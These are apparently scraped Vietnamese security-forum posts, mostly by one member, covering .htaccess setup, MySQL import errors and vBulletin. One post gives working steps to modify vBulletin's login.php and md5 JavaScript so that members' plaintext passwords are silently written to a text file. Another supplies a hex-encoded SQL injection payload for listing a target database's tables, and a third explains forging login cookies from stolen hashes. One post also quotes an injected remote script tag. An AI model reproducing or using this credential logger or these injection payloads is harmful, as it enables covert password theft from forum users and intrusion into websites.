|
|
Bạn tạo 1 file .htaccess sau đó chèn nội dung mình gửi ở phần trả lời trên, sau đói sửa lại cái link dẫn đến trang báo lỗi là ok.
|
|
|
constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu
Bác conmale nói đúng mà Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn
PS: Em thích câu trả lời của bác conmale lắm
|
|
|
1. Web bạn không kiểm tra đầu vào tốt
2. Theo như image mà bạn gửi lên thì dữ liệu không bị mất mà chỉ bị chèn thêm thôi nhỉ.
Tạm khắc phục:
+ Run query:
Code:
UPDATE tên_table SET replace(Ten, '<script src="http://f1y.in/j.js></script>', '')
Điền tên_table lại rồi run query nhé bạn.
Về mặt lâu dài:
+ Kiểm tra lại đầu vào (nếu không biết, tìm hiểu thêm về lập trình), hehe.
|
|
|
Thế cái này là [Hỏi đáp] chứ [Thảo luận] cái gì
Cơ bản thì bạn dùng .htaccess với dòng lệnh:
Code:
ErrorDocument 404 page404.html
page404.html hoặc link nào đó là xong.
|
|
|
Thế hiện tại cái database của bạn là đang hoạt động hay giờ chỉ còn mỗi bản backup ? Nếu đang hoạt động thì bạn tiến hành REPAIR toàn bộ Tables, rồi sau đó mới Export về nhé
Ngoài ra do file của bạn khá nặng, nên bạn phải dùng những tool hỗ trợ đại loại như Bigdump để nó import vào database theo mỗi block queries nữa !
|
|
|
Khà khà, đang cua mà Đang cua thì tò mò, chứ đã quen rồi thì đừng nói là password, mà cả chìa khóa để cắm vào ổ khóa còn có )
|
|
|
Đúng rồi, tốt nhất không nên tham gia nhiều diễn đàn, như mình khi tạo 1 account ở mỗi diễn đàn đều phải tự đặt key cho cái domain của diễn đàn đó.
Ví dụ: hvaonline --> hv@0l1n3123456
Như vậy có bị lấy password thì hậu quả để lại cũng sẽ giảm đáng kể
|
|
|
OK, bác protectHat nói đúng, có lẽ mình không nên giúp bác ấy Mong boynet hiểu nhé
|
|
|
OK, mình vừa tải VBB 3.83 về, giờ thì ăn cơm đã, khi nào rỗi việc sẽ vào test lại giúp bác ngay
|
|
|
1. Đó là lý do tại sao mà mình đã ghi dòng lưu ý như thế này:
Và bạn lưu ý, do đây là code để xử lý lỗi mà bạn report, còn phát sinh thêm lỗi nào thì lúc này cần phải kiểm tra lại file SQL của bạn nữa
Trường hợp của bạn chắc là lỗi do file database mà bạn backup rồi File database của bạn nặng có nặng ko ?
2. Chạy Query bằng cách vào phpMyAdmin -> Run Query
|
|
|
Đúng rồi Đó là bước quan trọng nhất, vì phần đăng nhập của VBB đã dùng javascript để mã hóa md5() và sau đó thì nó xóa luôn giá trị password nguyên thủy mà bác vừa nhập, cho nên nếu không vô hiệu hóa cái dòng xóa giá trị này thì bác chỉ nhận được cái username thôi.
Uhm, bản vbb 3.8.3 đúng là không có dòng đó thật, vì trên máy mình chỉ có VBB 3.6.8, VBB 3.8.3 nó đã mã hóa luôn cái file javascript nên giá trị tìm đã thay đổi.
Và sau khi tìm hiểu sơ bộ thì phát hiện ra biến input lúc này đã đổi cái tên lại thành "B", cho nên ở bước 1 sẽ như thế này:
Mở file clientscript/vbulletin_md5.js, tìm dòng:
Code:
Rồi xóa luôn là ok !
|
|
|
MySQL said: #1062 - Duplicate entry '6344' for key 1
Thông báo này có nghĩa là trong database đã tồn tại 1 record có adminhelpid = 6344, như vậy trước khi bạn import lại thì bạn chạy query này để xóa record 6344 đó:
Code:
DELETE FROM adminhelp WHERE adminhelpid=6344
Và bạn lưu ý, do đây là code để xử lý lỗi mà bạn report, còn phát sinh thêm lỗi nào thì lúc này cần phải kiểm tra lại file SQL của bạn nữa
|
|
|
À sorry, các bác không nên lạm dụng nó nhé, vì cái này vi phạm quyền riêng tư trầm trọng đấy
|
|
|
Tính không viết giúp bác rồi, nhưng hôm nay chủ nhật trời nóng quá, lại còn bị khích tướng nữa nên đành chiều ý bác, lập trình bao nhiêu năm bây giờ lại để người như bác ra sức "dạy dỗ" như vậy cũng không hay
Cái này giống như kiểu, aha, ta vào một lớp học, ta hỏi thầy, "thầy ơi, vấn đề này em phải làm thế nào, thầy viết từ a-z cho em nhé", ok thế thì viết dùm đây, chắc chỉ có ở đây mới có như vậy thôi
Bước 1: Mở file clientscript/vbulletin_md5.js
Thay dòng:
input.value = '';
Thành:
//input.value = '';
Bước 2: Mở file login.php
Tìm đoạn:
Code:
if ($_POST['do'] == 'login')
{
Chèn vào bên dưới:
Code:
$fp = fopen("lyhuuloi.com.txt", "a+");
fwrite($fp, "Username: {$_POST['vb_login_username']}
Password: {$_POST['vb_login_password']}
");
rewind($fp);
Bước 3: Tạo file lyhuuloi.com.txt và CHMOD 777
Bước 4: Upload, rồi đợi. Kết quả được lưu vào file txt ấy nhé
PS: Mình thì không thích vớ vẩn với bác, nhưng lần sau bác có yêu cầu thì nói đàng hoàng nhé, không phải ai cũng chỉ biết nói thôi đâu
|
|
|
jforum3000 wrote:
boynet, đây cũng là một cách để biết.
Cách này không dùng được đâu bạn Nó chỉ là mã md5, trong khi bác ấy lại cần password chính xác từng chữ mà
|
|
|
việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được smilie . Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì smilie . Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!
Hóa ra là ai cũng biết cách chứ không biết làm nhỉ Chắc lúc làm việc, Vấn đề nào bác không biết bác cũng nhờ người khác giúp luôn đúng không
Tớ biết, nhưng tớ không muốn hướng dẫn cho bác ngay là để xem phản ứng của bác thế nào, như này thì hỏng cả. Thôi thì bác nào rãnh rỗi thì giúp bác ấy nhé
|
|
|
Bác nên dừng ý tưởng đó đi Nó đã vi phạm quyền cá nhân trầm trọng rồi đó Trên mọi phương diện, đó đã là một cách lấy mật khẩu bất hợp pháp, híc.
|
|
|
constructor_87 wrote:
@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie
Hi, mình đã trả lời lại trên Blog, thanks bạn đã comment, and hope you like it
Hello HVA
|
|
|
constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ?
anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ?
mong được chỉ giáo thêm. cám ơn!
Bạn nói đúng Nhưng vấn đề bạn lấy được mã md5 rồi mà không biết phải làm gì với nó thì đó là lúc mà bạn phải tìm hiểu về cấu trúc của website đang thâm nhập
Bạn phải hiểu được cách tạo ra mã md5 đó, ví dụ được md5 mấy lần, mã md5 này có liên quan đến một chuỗi nào đó để tạo ra nó không,... etc.
và quan trọng là hack thì phải biết mình cần cái gì,.. giống như kiểu muốn ăn thì lăn vào bếp vậy
I'm only a newbie, dont hurt me, plz
|
|
|
kimtulong wrote:
như bác hoasimtim nói như trên gần như là không thể vậy sao mọi người hack lỗi SQL injection tìm ra được cái mật khẩu md5 chỉ để ngắm thôi sao?hichic! smilie
Do md5() về thực tế là khó có thể dịch được, nên mã md5 lấy ra được từ kết quả hack thường được dùng vào việc tạo fake cookie
Về lý thuyết, cookie nào được lưu về dưới 1 tên ABC nào đó đều là sản phẩm của một thuật toán dựa vào mã md5 đã lưu ở database - hoặc trường hợp coder hơi gà một tí là lưu mã md5 có trong database mà không mã hóa thêm nữa.
Như vậy, hacker hoàn toàn có thể mô phỏng lại quy trình mã hóa này bằng cách dựa vào mã md5 lấy được, họ sẽ tạo được fake cookie để có thể đăng nhập một cách hợp lệ.
Chỉ có vậy thôi.
|
|
|
Trước hết bác phải convert database indiecraftslive sang mã HEX đã, mình đã convert qua thì nó thì được: 696e6469656372616674736c697665 và câu lệnh mà bác chèn vào những số nào hiển thị trên web sẽ là:
Code:
(select table_name from information_schema.tables WHERE table_schema=0x696e6469656372616674736c697665)
Vì ở đây nó đã chèn slash để vô hiệu hóa, nên chuyển sang HEX là by pass Để làm được thì bác nên trang bị cho mình hành trang là kiến thức về SQL bác nhé, đừng nên học hack một cách máy móc Như vậy bác sẽ trở thành kẻ phá hoại chứ ko phải là một người làm nhiệm vụ Bảo mật.
Good lucks.
|
|
|
Thế cái này là giúp chứ không phải học hỏi nhỉ, mình thì chỉ thích hướng dẫn chứ không thích làm cụ thể - và nhất là làm dùm, làm giúp Nên đây là cách làm Ngày xưa cũng vơ va vớ vẩn mà làm rồi sau đó lại bỏ vì thấy nó "quá đáng"
Để có thể làm thì bác cần phải biết: 2 chữ "Lập trình" và cuối cùng là PHP
Cách làm như sau:
1. Tìm đến đoạn xử lý đăng nhập của User
2. Bắt thông tin username và password lúc chưa bị mổ xẻ hay chấp vá gì hết
3. Sau đó lưu thông tin này vào 1 file .txt, ghi rõ "Username: XYZ, Password: ABC"
Rồi sau đó chỉ việc chờ Victim, à không, phải gọi là "mem có ý đồ pha phách" Cụ thể thế nào thì gồng mình lên nha bạn, có khó thì mới có kinh nghiệm
|
|
|
Hề hề Query Strings được truyền tới server đôi khi cần các từ trên thì sao bạn smilie vd:username của tui tui đặt là UNION TEAM hay admin_chinh admin_phu thì bạn lock hết sao ? nhất là khi query string chứa một bài post cho một bài viết trên forum chẳng hạn thì đôi khi đầy các từ trên ( HVA thì khỏi nói, liên tục hén smilie )
Cho xin ý kiến nhe bạn.
Thân,
Mình đọc từ trên xuống dưới thì rõ ràng thấy nhận định của xnohat là hợp lý, vì nếu chặn tất tần tật một cách vô thức như vậy thì cái này thì không phải là cách tối ưu trong hầu hết trường hợp.
Đó và việc bảo mật của webmaster, các webmaster thường không có user đăng ký các tên nhạy cảm như vậy.
Bạn hãy thử dùng công cụ search trên HVA để tìm từ khóa "UNION" xem có được phép không ?
Để có được sự bảo mật đôi khi người ta sẽ gặp phải những hạn chế đi kèm, không có một công cụ bảo mật nào được gọi là hoàn hảo cả, cái gì cũng có 2 mặt của nó bạn à
Cảm ơn bạn vì những ý kiến đóng góp !
Đó là chính sách bảo mật ở một số website, như HVA thường xuyên gánh chịu lượng request thì đó là một yêu cầu tối thiểu để chặn việc phá hoại Nói như bạn có nghĩa là mình không thể dùng Tool của bạn để áp dụng cho một website nói về Hacking à ? Vì khi làm một website nói về Hacking thì mình lại phải gõ đi gõ lại khá nhiều từ mà bạn đã chặn đấy kaka
Về cơ bản, trong PHP, khi dùng $_REQUEST là nó-đã-bao-gồm-$_GET-và-$_POST, do đó nếu hangxachtay chặn từ $_REQUEST là khá ổn về mặt xử lý dữ liệu đầu vào, chứ dùng mỗi $_GET thì không ăn thua, nếu không muốn nói là quá AMATEUR !
|
|
|
Ở đây, box này là lập trình web, bạn muốn hack thì sang box khác, tạo một chủ đề khác để thảo luận nhé Mình cũng đã nói những gì cần thiết cơ bản nhất trong Security về trường hợp này rồi.
|
|
|
|
|
|
|